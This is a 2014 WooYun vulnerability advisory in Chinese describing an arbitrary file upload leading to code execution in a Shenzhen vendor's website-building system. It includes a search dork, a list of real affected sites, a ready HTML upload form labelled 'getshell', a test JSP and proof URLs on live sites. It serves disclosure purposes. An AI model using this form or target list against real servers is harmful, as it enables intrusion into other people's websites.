某建站系统存在通用型文件上传导致任意代码执行 | wooyun-2014-072737

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2014-072737

漏洞标题：

某建站系统存在通用型文件上传导致任意代码执行

漏洞详情

披露状态：

2014-08-19：细节已通知厂商并且等待厂商处理中
2014-08-23：厂商已经确认，细节仅向厂商公开
2014-08-26：细节向第三方安全合作伙伴开放
2014-10-17：细节向核心白帽子及相关领域专家公开
2014-10-27：细节向普通白帽子公开
2014-11-06：细节向实习白帽子公开
2014-11-17：细节向公众公开

简要描述：

详细说明：

网站建设专家：深圳市恩捷科技有限公司 http://www.szenjie.com/
百度dork：inurl:fo/home.jsp
搜索的案例：

http://www.sztoxda.com/
http://www.chinatapes.com/
http://www.zkchina.com.cn/
http://www.dzydz.com/
http://www.szhms.com.cn/
http://www.szjscctv.cn/
http://www.huazengkeji.com/
http://www.sz-hws.com/
http://www.360ddz.cn/
http://www.wiseteam.net/
http://www.jcr-sensor.com/
http://www.eclink.net.cn/
http://www.jiasofa.com/
http://www.cstuniversal.com/
http://www.szkzg.com.cn/

反编译文件 WEB-INF/classes/com/ej/ss/common/action/UploadFileAction.class

可以看出，通过获取参数fileType的值，给变量path赋值（上传的路径），之后直接上传。
本地构造上传页面，直接 action 给 http://website/common/uploadFile.do?fileType=productDesc 即可。

<form method='post' action='http://website/common/uploadFile.do?fileType=productDesc'  enctype="multipart/form-data" >
  <input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/>
<button type=submit value="getshell">getshell</button> </form>

上传成功后，会提示文件路径（或直接访问 http://website/upload/img/productDesc/文件名.jsp）
本次测试上传的文件名为 wooyun.jsp ，内容如下：

<%
out.print("just4test....From WooYun.Org");
%>

漏洞证明：

给出部分案例，证明其通用型：
http://www.sztoxda.com/upload/img/productDesc/wooyun.jsp

http://www.zkchina.com.cn/upload/img/productDesc/wooyun.jsp

http://www.wiseteam.net/upload/img/productDesc/wooyun.jsp

http://www.dzydz.com/upload/img/productDesc/wooyun.jsp

修复方案：

版权声明：转载请注明来源 Coody@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：18

确认时间：2014-08-23 23:39

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Coody@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Coody@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞